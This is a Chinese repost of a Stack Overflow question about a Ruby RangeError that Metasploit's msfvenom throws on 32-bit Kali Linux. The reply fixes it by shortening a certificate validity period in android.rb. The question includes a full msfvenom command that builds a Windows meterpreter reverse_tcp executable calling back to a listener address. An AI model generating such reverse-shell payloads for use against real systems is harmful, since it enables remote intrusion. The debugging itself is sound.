gpt4 book ai didi

linux - Kali Linux - MSFVenom 有效负载创建错误

转载 作者:太空宇宙 更新时间:2023-11-04 05:36:28 27 4
gpt4 key购买 nike

所以我刚刚在我的 Dell Inspiron 5000 系列、Intel Core I5(第 8 代)上安装了 Kali Linux Rolling!当我尝试在 MSFVenom(黑客操作系统附带的最佳有效负载创建工具之一)中创建 Windows 反向 TCP 有效负载时,我遇到了错误。这是我输入的内容:

root@GetOffMyLawnBish:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.100 LPORT=443 -f exe > Desktop/localpayload.exe

这就是我得到的结果:

/usr/share/metasploit-framework/lib/msf/core/payload/android.rb:92:in `not_after=': bignum too big to convert into `long' (RangeError)
from /usr/share/metasploit-framework/lib/msf/core/payload/android.rb:92:in `sign_jar'
from /usr/share/metasploit-framework/lib/msf/core/payload/android.rb:123:in `generate_jar'
from /usr/share/metasploit-framework/modules/payloads/singles/android/meterpreter_reverse_http.rb:50:in `generate_jar'
from /usr/share/metasploit-framework/lib/msf/core/payload/android.rb:38:in `generate'
from /usr/share/metasploit-framework/lib/msf/core/payload.rb:204:in `size'
from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:91:in `block in recalculate'
from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:78:in `each_pair'
from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:78:in `recalculate'
from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:251:in `block in load_modules'
from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:248:in `each'
from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:248:in `load_modules'
from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:119:in `block in load_modules'
from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:117:in `each'
from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:117:in `load_modules'
from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:41:in `block in add_module_path'
from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:40:in `each'
from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:40:in `add_module_path'
from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:50:in `block in init_module_paths'
from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:49:in `each'
from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:49:in `init_module_paths'
from /usr/share/metasploit-framework/lib/msf/base/simple/framework.rb:121:in `simplify'
from /usr/share/metasploit-framework/lib/msf/base/simple/framework.rb:73:in `create'
from /usr/bin/msfvenom:36:in `init_framework'
from /usr/bin/msfvenom:45:in `framework'
from /usr/bin/msfvenom:327:in `<main>'

有人知道这里发生了什么吗?请告诉我!

哦,顺便说一句,我已经创建了一个公共(public)有效负载,这将是我的本地有效负载,但奇怪的是公共(public)有效负载完成时没有任何问题,但是一旦我将 IP 地址更改为本地有效负载,它就会给我一个错误:(。

最佳答案

这是 32 位版本上出现的问题。如果您不介意,请尝试使用 64 位版本。

如果您必须使用 32 位,那么您可以更改/usr/share/metasploit-framework/lib/msf/core/payload/android.rb 文件(位于第 87 行左右)

cert.not_after = cert.not_before + 3600*24*365*20 # 20 years

cert.not_after = cert.not_before + 3600*24*365*2 # 2 years

请记住,这可能会影响 Android 有效负载的可靠性。

关于linux - Kali Linux - MSFVenom 有效负载创建错误,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/49744227/

27 4 0
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com